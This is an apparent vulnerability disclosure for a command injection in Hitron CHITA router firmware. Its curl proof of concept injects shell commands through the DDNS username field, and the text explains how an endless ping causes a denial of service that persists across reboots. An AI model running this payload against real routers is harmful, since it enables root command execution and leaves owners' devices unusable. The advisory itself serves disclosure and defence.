CVE-2022-25017: Hitron CHITA OS Command Injection (UPC Branded)

Hitron CHITA OS Command Injection (UPC Branded)

# Exploit Title: Hitron CHITA OS Command Injection to DoS

# Software: Hitron Technologies CHITA Router Firmware (UPC branded)

# Version: 7.2.2.0.3b6-CD

# Author: `zaeek` (GBTI SA)

# CVE: TBA

# CWE: CWE-77 | CWE-400

# Date: 15.04.2021

# CVSSv3: 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)

Summary: A command injection vulnerability in Hitron CHITA router allows execution of OS commands. The injection vector resides at dynamic dns services “dyndns” configuration logic.

Due to improper sanitization of user-supplied data it is possible to input addition OS shell syntax together using a semicolon. To exploit this vulnerability, the attacker must be authenticated for web access.

Additionally it is possible to cause a Denial of Service by injecting a command which isn’t limited by any argument (like `ping` command without `-c` delimiter), rendering the router software unstable and in the end, impossible to handle HTTP requests to web panel.

Even after router restart, the injected command is started during router startup, causing the router to being unusable without hard factory reset.

The Denial of Service case is a subject to deeper testing, because of the limited time which we were given to test it, together with the lack of second router to confirm the reproducibility.

PoC:

curl ‘http://192.168.0.1/1/Device/DDNS’ \

-H ‘User-Agent: Mozilla/5.0 Firefox/85.0’ \

-H ‘Accept: application/json, text/javascript, */*; q=0.01’ \

-H ‘Accept-Language: en-US,en;q=0.5’ \

–compressed \

-H ‘Content-Type: application/x-www-form-urlencoded’ \

-H ‘X-HTTP-Method-Override: PUT’ \

-H ‘X-Requested-With: XMLHttpRequest’ \

-H ‘Origin: http://192.168.0.1’ \

-H ‘DNT: 1’ \

-H ‘Authorization: Basic YWRtaW46YWNldHlsb2Nob2xpbmE=’ \

-H ‘Connection: keep-alive’ -H ‘Referer: http://192.168.0.1/webpages/index.html’ \

-H ‘Cookie: sessionindex=0&userid=e9JwY6BG6rPLnFXUM1mV6gK5Zxq7ND4Z; sessionToken=1586484992; SID=3920641792; preSession=nMQLZPa3pyBqbTvFmg7Eddn1QdxDX9n6; modelname=CHITA; LANG_COOKIE=en_US; isEdit=1; isEdit1=0; isEdit2=0; isEdit3=0; PHPSESSID=805d894df5e7cc7d3a39eecee5ca3824’ \

-H ‘Pragma: no-cache’ \

-H ‘Cache-Control: no-cache’ \

–data-raw ‘model=%7B%22errCode%22%3A%22000%22%2C%22errMsg%22%3A%22%22%2C%22ddnsOnOff%22%3A%22ON%22%2C%22ddnsSrvProvider%22%3A1%2C%22ddnsUsername%22%3A%22d[**INJECT CMD WITH SEMICOLON**]d%22%2C%22ddnsPassword%22%3A%22a%22%2C%22ddnsHostnames%22%3A%22asdasd.zapto.org%22%2C%22ddnsUpdateInterval%22%3A%22604800%22%2C%22id%22%3A%221%22%7D&csrf=1lomnjjnqtc00.771727mgis8w&_method=PUT’

In the above curl example, an OS command inject vulnerability allows to execute local system binaries by replacing `ddnsUsername` parameter input or concatenating with direct OS command.

The injected command will be executed, most likely with root privileges. If the injected command is continuous (like no `-c` delimiter for `ping`), it will cause denial of service situation, because of underlying DDNS handler which is never finished.